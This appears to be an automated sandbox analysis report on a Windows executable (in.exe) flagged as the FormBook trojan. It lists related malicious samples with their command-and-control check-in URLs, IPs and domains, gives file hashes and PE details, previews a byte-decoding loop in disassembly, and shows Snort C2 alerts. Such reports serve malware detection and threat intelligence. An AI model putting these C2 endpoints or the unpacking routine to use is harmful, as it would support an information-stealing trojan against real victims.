                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.42.151.234, 40.88.32.150, 23.210.248.85, 51.104.144.132, 92.122.213.194, 92.122.213.247, 67.26.81.254, 8.248.137.254, 67.27.158.126, 8.248.139.254, 8.248.133.254, 51.103.5.159, 52.155.217.156, 20.54.26.129, 51.11.168.160
                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                199.59.242.153zHgm9k7WYU.exeGet hashmaliciousBrowse
                                                • www.bigdudedesign.com/xle/?0V3lvN=YvRXzPexWxVddR&uXrpEpT=p5BrHqV+x52+8/dkhIH/2RZzzPQHVqXKKEjnsmk8YSbLMdX3vj27OxdUa7hcnD/L48D0
                                                65BV6gbGFl.exeGet hashmaliciousBrowse
                                                • www.fallguysmovile.com/kgw/?tTrL=Fpgl&D81dO=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864URq+F/upv
                                                PO85937758859777.xlsxGet hashmaliciousBrowse
                                                • www.alwayadopt.com/8rg4/?RJ=WsO1qiz2dXOYooBDjHaDnsysS09xwMceuB64tfjAiEOaRoVYdCuvrl6g5TO0aeWlvtBBiA==&LFQHH=_pgx3Rd
                                                PO#218740.exeGet hashmaliciousBrowse
                                                • www.shelvesthatslude.com/wpsb/?Wxo=rpLKkbKOXOuXHBcSnbCAYX8fIodJm2eBCOkizxG+Jmq98pcfRrdFVbp7k49Tb//P+n9l&vB=lhv8
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • www.laalianza.net/nki/?-Z1l=PROIUmUOyDGddH4liQ5hJmVkj46+Q85xpoxC45PqJI4e45Ope3SXSrB15gOtY6GR/pks5ou7bA==&5ju=UlSpo
                                                c6Rg7xug26.exeGet hashmaliciousBrowse
                                                • www.fallguysmovile.com/kgw/?JfExsTlp=Q8j3zo2PyWwTAT2GiUT3xIethN2qaDDEMDPTiTcyve6+EbM4cYnHuFUs864+OaOF7shv&njnddr=RhlPiv
                                                IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                                • www.myaarpdentalpln.com/09rb/?Jt78=5Fl0Gne6++jCyaX7Drm8Xn32HTt8H/jqBsF3NSEqn1nDC6nrfbel4dCYEQQYkDcDl2++&pN9=EXX8_N6xKpqxS
                                                mQFXD5FxGT.exeGet hashmaliciousBrowse
                                                • thevampire_vvv.byethost32.com/loglogin.html
                                                099898892.exeGet hashmaliciousBrowse
                                                • www.fux.xyz/nt8e/?2dj=y/4CZD0u6UTnndZ84eN1F0ffB2o9AcFBv2a7yWGMbwZk5TncQjhg8LsZLtt2QtFrhXJ5&BR-LnJ=YVJpeDOX
                                                ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                                • ww1.survey-smiles.com/
                                                SAWR000148651.exeGet hashmaliciousBrowse
                                                • www.phymath.science/6bu2/?u6u0=C0Tcv4PEDaSqiqbiBHmU4chmBJ2Ib35dQ7WAYQJ79jvi7RJiRJeSkc3aZR5iI925ug+e&9r4l2=xPJtQXiX
                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                • www.biphome.com/th7/?Wxo=F3X7BvJsNeC3FygCw13H4IB8jadIkqJtXdmqtCOR8NGnB4xp+pRJAqP9Tbys+XJlW324&vB=lhvxP
                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                • www.fallguysgen.com/09rb/?BjR=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1YP1OuE1trgD&ojPLdR=9r9xbv2Prvr4
                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                • www.fallguysgen.com/09rb/?QL3=8wyat+wXPx2GJTjzAS1v8j/sun3jJOBqARbtJLQTOj6W6terly/mLKuj1bj2SeINgKdVJ18iPg==&vDH4Y=N8lT8DApP2
                                                Payment Order Inv.exeGet hashmaliciousBrowse
                                                • www.lakecharlesloan.com/m98/
                                                h3dFAROdF3.exeGet hashmaliciousBrowse
                                                • www.srteamsex.com/jskg/?8pgD2lkp=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&yTIDml=X6XHfZU8d
                                                kqwqyoFz1C.exeGet hashmaliciousBrowse
                                                • www.srteamsex.com/jskg/?9roHn=vPxUJOJ2Aeffo2LE3jfwO3D5fUiArIaEsmmMIyas9ke7k/N8Gf6ZXTSsViol9x5Z8LaI&npHhW=3fq4gDD0abs8
                                                file.exeGet hashmaliciousBrowse
                                                • www.capialhealth.com/w8en/?wZ=OZNhib&iJE=PC3EVoXx07elaN9zQ9JVPu3uhPMA8lrp9yOZFfU9U+2Z+rMvgXeGWrCKYNniyi9/Q+4F/80NIg==
                                                PByYRsoSNX.exeGet hashmaliciousBrowse
                                                • www.traptlongview.com/csv8/?wPX=9GN7fGOG/XNjrF88E5TxviJgjVB4/la6MjhQ3CZtrJBE6uvIYv2ahYgslWD0h5HAfE9z&UPnDHz=SVETu4vhSBmH6
                                                3Y690n1UsS.exeGet hashmaliciousBrowse
                                                • www.globepublishers.com/csv8/?SR-D3jP=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODb9flfr/+N&J0GTk=3fPL-xo0rXp0UNn
                                                198.185.159.144JAAkR51fQY.exeGet hashmaliciousBrowse
                                                • www.scheherazadelegault.com/csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf
                                                xrxSVsbRli.exeGet hashmaliciousBrowse
                                                • www.k2bsi.com/nki/?yrsdQvAx=umpOVK1DLRpz59fCQvoQKPVeVuPOlB8LOfW/ILmQB3PhhGOYoIzQzfga7bIBOwmKT5tP&D8h8=kHux
                                                T0pH7Bimeq.exeGet hashmaliciousBrowse
                                                • www.silhouettebodyspa.com/de92/?DDK0T2k=aW4bwX+7+rq/lVtFlzifkf7EnMQHuKASlHyg88U21n5YYvOPVn8iR8TT3S91DLVPMub+&BZ=E2MxeZLx_FcL
                                                QN08qH1zYv.exeGet hashmaliciousBrowse
                                                • www.theatomicshots.com/xle/?vTdLK=dZpq/2SbxZ9fjKphiMNZYhV3L/2Ns2NYRA9XvZOFrZWohuKG4iXKPwFAYUSLWPv7Pa79MYJLDg==&S2Jl9Z=RRcTylbXy0tX
                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                • www.apatoncreative.com/th7/?Lfj=x56fhMVxJtKyooJjbkZj6irCG4tLbrbttVEl8mlzAIopbcteeKKQK7FUPkDaIyZXTPAC&rPjhC=ndr8U6TH3RV
                                                Nuevo pedido.exeGet hashmaliciousBrowse
                                                • www.njrfilm.com/heye/?Blr=qirqrgEujerdvvFEs356TUQ6GC7lF6Taze+hxhE8jjq9WKsCXbel99KdtLbciWUtGqTdqUiN+w==&a0G=tZktkpT8iptto
                                                payment copy.exeGet hashmaliciousBrowse
                                                • www.nathanlaube.net/s9zh/?KXfDz=DBADCSi7nHEt6+5LA4g7Smwax6AM2LZUSRgEmz7WLJCapi1fLmEVQQgOLMbM5GrrnTzu51DEtA==&Dzrpc=ZZL0mpThqt
                                                List.exeGet hashmaliciousBrowse
                                                • www.edmondscakes.com/2kf/?mL08l=WZA0u2VhjbRpJ&UR-X423=9XMLlWJTI6vAfrHRazBeuJnX2zF/KKkFVijVc9HuNL/CE78GsXIW/AGNdSUz4gY9rg1I28QruQ==
                                                AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                                • www.ctsafaris.com/6bu2/?t8o8st4=pybu1iZU8EvD/Kwf0YniJAqiIJo48L/uOwPEO/zl8A3Q1/S+hJ+LaYXOdcN2aHWYu3hX&9rWH=Klk0
                                                mfcnvy4bb.exeGet hashmaliciousBrowse
                                                • www.betterbeautymemphis.com/p2he/?Qtu=VpiRuVNQmDdrBMFqj8Qpx61AyE0Jq88G6VKk4WdTWtiVMwWcTZ7OyZc0ZykkLKsTQDoW&MZW0=kHQD
                                                LETTER OF AUTHORITY 18DEC.xlsxGet hashmaliciousBrowse
                                                • www.magiclabs.media/bw82/?dZotnbmH=P2+pz5Is5Uh04hegp1TQmwqfNtgh4ua+i28lAlYonz3NKvuB08r74eFNyM86KRvy702eoA==&WFN0HX=qJE4
                                                IMG-033-040.exeGet hashmaliciousBrowse
                                                • www.ladycello.info/o56q/?rTdHh=iu3bU58RhptOiIOepCaJCiDkHQOSgkhlzz1igFvzi5B3uxD1XBfv3PEzoSZTtRgs5OTfsjm+hQ==&AR-pA8=djItCF3xQPxp
                                                anthon.exeGet hashmaliciousBrowse
                                                • www.thesacralgenie.com/94sb/?BX=E0Gh0VgpxJYXCNpP&8pw4CDfX=ljcQCJ/CcvMyQHtxqytd+84DD1WgmQG8zULKd2F9VUSi8RHcUyfD/7Jq+SVBeNrFnWdM
                                                F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                • www.usmedicarenow.com/bw82/?KZQL=cQgJWKf8RQ1tgXmhpNlNvU1Wcwt7yBWYkRci+XoIvJPaxwQIB73a/eHibgewyTkN/jUTxmaioA==&RlW=bjoxnFJXA8hpCv
                                                Shipment Document BLINV And Packing List Attached.exeGet hashmaliciousBrowse
                                                • www.ghoster.agency/bg8v/?Kh6dX=VngxCTsPJF&nRYDg6=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JRVoUW+4pzAS
                                                faithful.exeGet hashmaliciousBrowse
                                                • www.gabriellagullberg.com/jqc/?kPg8q=yyNOPPYs37n20AZMC2utoqKbvgU82l9OojTYKZBTM2Apr8X8ZSt9KWvG0aIpWsncp7dE&1bS=WHr8cFhpvJ
                                                scnn7676766.exeGet hashmaliciousBrowse
                                                • www.mocakavastudios.com/m3px/
                                                uiy3OAYIpt.exeGet hashmaliciousBrowse
                                                • www.lucindabinteriors.com/cfo/
                                                PO8479349743085.exeGet hashmaliciousBrowse
                                                • www.theseeingglass.com/d8h/?7nzhT=fpj2dyTVU459sTu3g3ENtlg+wmcPgNmBihM9KeY7l0jVRhRPuCQYHIKtRCAj+Ch6S1R/&u4vtf=hBZ8AxiP9Lt
                                                PRODUCT INQUIRY.pdf.exeGet hashmaliciousBrowse
                                                • www.tealbirding.com/cfo/?EbJ=XVKKLnTuEneGxLnA9Mjxxc1SUCHc0HvSfORAuJqDQH4eeu9wFra71eo01Z9TJZMAgpDN&rL0=d8qpVlJxGr1

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                parkingpage.namecheap.comurgent specification request.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                inquiry10204168.xlsxGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                Project review_Pdf.exeGet hashmaliciousBrowse
                                                • 198.54.117.215
                                                0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                • 198.54.117.216
                                                RFQ 41680.xlsxGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                Doc_74657456348374.xlsxGet hashmaliciousBrowse
                                                • 198.54.117.217
                                                bpW4Utvn8eAozb4.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                current productlist.exeGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                inv.exeGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                Inquiry-RFQ93847849-pdf.exeGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                order.exeGet hashmaliciousBrowse
                                                • 198.54.117.218
                                                Rfq_Catalog.exeGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                SMA121920.exeGet hashmaliciousBrowse
                                                • 198.54.117.217
                                                scan_118637_pdf.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                • 198.54.117.217
                                                SecuriteInfo.com.Heur.16160.xlsGet hashmaliciousBrowse
                                                • 198.54.117.212
                                                PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                                • 198.54.117.217
                                                ext-sq.squarespace.comzHgm9k7WYU.exeGet hashmaliciousBrowse
                                                • 198.49.23.144
                                                JAAkR51fQY.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                13-01-21.xlsxGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                xrxSVsbRli.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                QN08qH1zYv.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                FTH2004-005.exeGet hashmaliciousBrowse
                                                • 198.49.23.145
                                                order.exeGet hashmaliciousBrowse
                                                • 198.49.23.145
                                                inv.exeGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                Order (2021.01.06).exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                Nuevo pedido.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                payment copy.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                                • 198.185.159.145
                                                List.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                mfcnvy4bb.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                Purchase Order 75MF3B84_Pdf.exeGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                                                • 198.49.23.144
                                                (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                • 198.185.159.145

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                BODIS-NJUSzHgm9k7WYU.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                65BV6gbGFl.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                PO85937758859777.xlsxGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                PO#218740.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                c6Rg7xug26.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                sample20210111-01.xlsmGet hashmaliciousBrowse
                                                • 199.59.242.150
                                                IRS Notice Letter pdf document.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                mQFXD5FxGT.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                099898892.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                ZIPEXT#U007e1.EXEGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                990109.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                SAWR000148651.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                https://www.chronopost.fr/fclV2/authentification.html?numLt=XP091625009FR&profil=DEST&cc=47591&type=MASMail&lang=fr_FRGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                IRS Notice Letter.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                Payment Order Inv.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                h3dFAROdF3.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                kqwqyoFz1C.exeGet hashmaliciousBrowse
                                                • 199.59.242.153
                                                SQUARESPACEUSJ0OmHIagw8.exeGet hashmaliciousBrowse
                                                • 198.49.23.144
                                                zHgm9k7WYU.exeGet hashmaliciousBrowse
                                                • 198.49.23.144
                                                JAAkR51fQY.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                13-01-21.xlsxGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                xrxSVsbRli.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                pHUWiFd56t.exeGet hashmaliciousBrowse
                                                • 198.49.23.145
                                                T0pH7Bimeq.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                QN08qH1zYv.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                FTH2004-005.exeGet hashmaliciousBrowse
                                                • 198.49.23.145
                                                order.exeGet hashmaliciousBrowse
                                                • 198.49.23.145
                                                inv.exeGet hashmaliciousBrowse
                                                • 198.185.159.145
                                                SHIPPING INVOICEpdf.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                Nuevo pedido.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                payment copy.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                https://www.cloudfilesend.com/x/jvNrWPGTjrB1Get hashmaliciousBrowse
                                                • 198.185.159.145
                                                List.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                AWBInvoice INA10197.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                990109.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                mfcnvy4bb.exeGet hashmaliciousBrowse
                                                • 198.185.159.144
                                                NAMECHEAP-NETUSSecuriteInfo.com.BehavesLike.Win32.Generic.cc.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                DHL-Address.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                New FedEx paper work review.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                PO-000202112.exeGet hashmaliciousBrowse
                                                • 63.250.34.114
                                                urgent specification request.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                • 198.54.117.210
                                                shipping-document.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Project review_Pdf.exeGet hashmaliciousBrowse
                                                • 198.54.117.215
                                                iVUeQOg6LO.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                mscthef-Fichero-ES.msiGet hashmaliciousBrowse
                                                • 162.255.118.194
                                                SecuriteInfo.com.Generic.mg.e92f0e2d08762687.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order -263.exeGet hashmaliciousBrowse
                                                • 162.0.232.59
                                                Duty checklist and PTP letter.exeGet hashmaliciousBrowse
                                                • 162.255.119.136
                                                zz4osC4FRa.exeGet hashmaliciousBrowse
                                                • 162.0.238.245
                                                0XrD9TsGUr.exeGet hashmaliciousBrowse
                                                • 198.54.117.216
                                                DHL-document.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                RFQ 41680.xlsxGet hashmaliciousBrowse
                                                • 198.54.117.211
                                                Invoice.exeGet hashmaliciousBrowse
                                                • 162.213.255.55
                                                wCRnCAMZ3yT8BQ2.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                • 68.65.122.35

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                No created / dropped files found

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.892773297728818
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:in.exe
                                                File size:237568
                                                MD5:cc35be28c18578d43849919ac1025d5a
                                                SHA1:60bcb41d5ef76af919c769fab88f53c6a623a83b
                                                SHA256:0c9d116a854e274534015e3e8e8349687c0c17b01653723642aeee53aa39bfac
                                                SHA512:489abbc5a24d8dae03998387b246bc51459fcb4135aab480cc1f8a6bb509343529bf13a99fe299eff13f1e5be4af36c1058c16ae79a0afe1eda92e971938e7f1
                                                SSDEEP:6144:ouPcYfkbIjb4UG5rGbq8NP/wQX26LR47tGOjRFSB+Fhv5:oijbW5raqc/wQm6LWXj3So3v5
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........UL...L...L....49.M.....G.\...L...w.......O.......N...kR0.M...kR7.M...kR2.M...RichL...........................PE..L...@.._...

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x407970
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x5FFEA440 [Wed Jan 13 07:41:52 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:6
                                                OS Version Minor:0
                                                File Version Major:6
                                                File Version Minor:0
                                                Subsystem Version Major:6
                                                Subsystem Version Minor:0
                                                Import Hash:13f6eb96e7165e986a0d233796ec15e0

                                                Entrypoint Preview

                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                mov eax, 00001E14h
                                                call 00007F2FA4F042B8h
                                                push 00409BCCh
                                                call dword ptr [00408028h]
                                                mov dword ptr [ebp-0Ch], eax
                                                call 00007F2FA4F03EF5h
                                                push 069A1AD6h
                                                mov eax, dword ptr [ebp-0Ch]
                                                push eax
                                                call 00007F2FA4F03DD7h
                                                mov dword ptr [ebp-20h], eax
                                                push 09C857BEh
                                                mov ecx, dword ptr [ebp-0Ch]
                                                push ecx
                                                call 00007F2FA4F03DC6h
                                                mov dword ptr [ebp-10h], eax
                                                push 93B3503Eh
                                                mov edx, dword ptr [ebp-0Ch]
                                                push edx
                                                call 00007F2FA4F03DB5h
                                                mov dword ptr [ebp-14h], eax
                                                push 0000000Ah
                                                push 00409BE8h
                                                push 00000000h
                                                call dword ptr [ebp-20h]
                                                mov dword ptr [ebp-18h], eax
                                                mov eax, dword ptr [ebp-18h]
                                                push eax
                                                push 00000000h
                                                call dword ptr [ebp-10h]
                                                mov dword ptr [ebp-1Ch], eax
                                                push 00001A05h
                                                mov ecx, dword ptr [ebp-1Ch]
                                                push ecx
                                                lea edx, dword ptr [ebp-00001E14h]
                                                push edx
                                                call 00007F2FA4F04216h
                                                add esp, 0Ch
                                                mov dword ptr [ebp-08h], 00000000h
                                                jmp 00007F2FA4F03F7Bh
                                                mov eax, dword ptr [ebp-08h]
                                                add eax, 01h
                                                mov dword ptr [ebp-08h], eax
                                                cmp dword ptr [ebp-08h], 00001A05h
                                                jnc 00007F2FA4F04077h
                                                mov ecx, dword ptr [ebp-08h]
                                                mov dl, byte ptr [ebp+ecx-00001E14h]
                                                mov byte ptr [ebp-01h], dl
                                                movzx eax, byte ptr [ebp-01h]
                                                neg eax
                                                mov byte ptr [ebp-01h], al
                                                movzx ecx, byte ptr [ebp-01h]
                                                not ecx
                                                mov byte ptr [ebp-01h], cl
                                                movzx edx, byte ptr [ebp-01h]

                                                Rich Headers

                                                Programming Language:
                                                • [LNK] VS2012 build 50727
                                                • [ C ] VS2012 build 50727
                                                • [LNK] VS98 (6.0) imp/exp build 8168
                                                • [RES] VS2012 build 50727

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x81340xc8.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x1a78.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xaac.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x110.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x6dba0x6e00False0.425887784091data6.16564713426IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x6fe0x800False0.4375data4.45062304769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x90000x22ad0x2400False0.255099826389data4.66400488054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .rsrc0xc0000x1a780x1c00False0.9453125data7.7694048454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0xe0000xb1a0xc00False0.7734375data6.44217887703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountry
                                                RT_RCDATA0xc0700x1a05dataEnglishUnited States

                                                Imports

                                                DLLImport
                                                MSVCRT.dllmemset, pow, _strtime, _strdate, strlen, strcmp, strcat, strcpy, memcpy, isprint, malloc, exit, scanf, puts, fclose, putchar, printf, fscanf, fprintf, fopen, _strupr
                                                KERNEL32.dllGetStdHandle, HeapAlloc, ReleaseMutex, SuspendThread, ReadConsoleA, SetConsoleCursorPosition, GetModuleHandleW, GetProcessHeap, GetPrivateProfileSectionNamesW
                                                SHELL32.dllSHEmptyRecycleBinW
                                                MAPI32.dll
                                                WINMM.dllmidiOutGetErrorTextA, midiConnect, midiInStop, waveOutOpen, waveInGetDevCapsW, WOW32DriverCallback
                                                loadperf.dllLoadPerfCounterTextStringsW, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA, LoadPerfCounterTextStringsA
                                                mscms.dllDisassociateColorProfileFromDeviceW, SetColorProfileElementSize, CheckColors, GetPS2ColorRenderingIntent, SetColorProfileHeader, GetCountColorProfileElements, GetStandardColorSpaceProfileW
                                                COMDLG32.dllChooseFontW, ChooseColorW, ReplaceTextA
                                                USER32.dllGrayStringW, GetDC

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                01/13/21-21:11:13.854321TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.7198.185.159.144
                                                01/13/21-21:11:13.854321TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.7198.185.159.144
                                                01/13/21-21:11:13.854321TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.7198.185.159.144
                                                01/13/21-21:11:34.455174TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.7199.59.242.153
                                                01/13/21-21:11:34.455174TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.7199.59.242.153
                                                01/13/21-21:11:34.455174TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.7199.59.242.153
                                                01/13/21-21:12:37.794760TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.794.23.162.163
